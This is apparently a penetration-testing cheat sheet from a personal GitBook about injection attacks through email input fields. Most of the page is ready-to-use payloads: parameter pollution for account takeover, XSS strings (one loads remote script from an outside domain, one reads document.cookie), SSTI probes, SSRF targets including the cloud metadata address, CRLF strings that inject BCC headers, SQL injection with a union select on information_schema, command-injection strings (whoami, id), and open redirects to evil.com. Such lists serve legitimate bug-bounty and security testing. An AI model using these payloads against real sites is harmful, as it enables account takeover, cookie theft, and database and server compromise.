# Email injections

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% hint style="success" %}
*Create multiple accounts with an alias*\
\
*<email@bugcrowdninja.com>*
\
*<email+1@bugcrowdninja.com>*
\
*<email+2@bugcrowdninja.com>*
{% endhint %}

```
user[email][]=valid@email.com&user[email][]=attacker@email.com
```

## JSON

`{"email":"mymail@b.com"}`&#x20;

Try:

```
{"email":["mymail@b.com", "attacker@x.com"]}
{"email":"mymail@b.com", "email":"attacker@x.com"}
email=attacker@x.com
```

## Punnycode

Check Email Registration

{% content-ref url="registration-form" %}
[registration-form](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/registration-form)
{% endcontent-ref %}

## Parser Abuse - Domain confusion

```
oastify.com!collab\@example.com
collab%psres.net(@example.com
```

{% embed url="<https://portswigger.net/research/splitting-the-email-atom>" %}

{% embed url="<https://github.com/portswigger/splitting-the-email-atom>" %}

## XSS

```
"><script>alert(1)</script>@test.com
"><svg/onload=alert(3)>@test.com
"><svg/onload=confirm(1337)>"@x.y
"<script src=//xsshere?"@email.com
"><Img/Src/OnError=alert(1)>"@gmail.com
"><Img/Src/OnError=import('//X55.is')>"@gmail.com
```

```
"><Svg/OnLoad=alert(1)>"@gmail.com
"><svg/onload=confirm(1)>"@x.y
```

```
test+(<script>alert(0)</script>)@example.com
attacker@gmail.com'\"<svg/onload=alert(document.cookie)>
```

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

`"><img/src/onerror=import('//domain/')>"@yourdomain.com`

{% content-ref url="xss" %}
[xss](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/xss)
{% endcontent-ref %}

## SSTI

```
test+${{7*7}}@example.com

test+(${{7*7}})@example.com

test-(${{7*7}})@example.com
```

## SSRF

```
test@your-burpcollaborator.net
test@requestbin.net
test@127.0.0.1
test@localhost
test@169.254.169.254
```

## CRLF

{% content-ref url="crlf-injection" %}
[crlf-injection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/crlf-injection)
{% endcontent-ref %}

{% content-ref url="password-reset" %}
[password-reset](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/password-reset)
{% endcontent-ref %}

Register or reset password

```
test@example.com%0d%0aBCC:attacker@example.com
test@example.com\r\nBCC:attacker@example.com
test@example.com%0aCC:attacker@example.com
test@example.com\r\nContent-Type:text/html\r\n\r\n<b>Injected</b>
```

```
test@example.com%0d%0aInjected-Header: injected
test@example.com%0aInjected-Header: injected
```

## SQL Injection

{% content-ref url="sql-injection" %}
[sql-injection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/sql-injection)
{% endcontent-ref %}

```
test' OR '1'='1@example.com
test" OR "1"="1@example.com
test@example.com'--
test@example.com") OR 1=1--
```

```
"1-'or'1'='1"@email.com
```

```
john.doe+intigriti' or/**/1/**/=/**/--@example.com
```

```
johne.doe+intigriti'/**/or/**/1/**/=/**/1/**/--@example.com
```

```
test+intigiriti'/**/union/**/select/**/table_name/**/from/**/information_schema.tables--@test.test
```

{% embed url="<https://book.hacktricks.xyz/pentesting-web/email-injections>" %}

{% embed url="<https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>" %}

## Command Injection

{% content-ref url="../../ctf/misc/command-injection" %}
[command-injection](https://0xss0rz.gitbook.io/0xss0rz/ctf/misc/command-injection)
{% endcontent-ref %}

```
test@example.com; whoami
test@example.com && id
test@example.com | uname -a
test@example.com`id`
```

## Open Redirection

```
test@example.com%0d%0aLocation:https://evil.com
test@example.com/?next=https://evil.com
```

## Bypass Access Control

{% embed url="<https://portswigger.net/research/splitting-the-email-atom>" %}

## HTML injection - Subscription form

{% embed url="<https://medium.com/@mohamed.yasser442200/email-html-injection-with-a-simple-tip-aeab346fbefc>" %}

## Resources

{% embed url="<https://github.com/HackTricks-wiki/hacktricks/blob/master/pentesting-web/email-injections.md>" %}

{% embed url="<https://infosecwriteups.com/the-ultimate-guide-to-email-input-field-vulnerability-testing-18f96fc42251>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FtT3srZzbUxV8iN6zjNrl%2Fimage.png?alt=media&#x26;token=962e4759-e8b9-4e26-b998-6df524fdfaf8" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)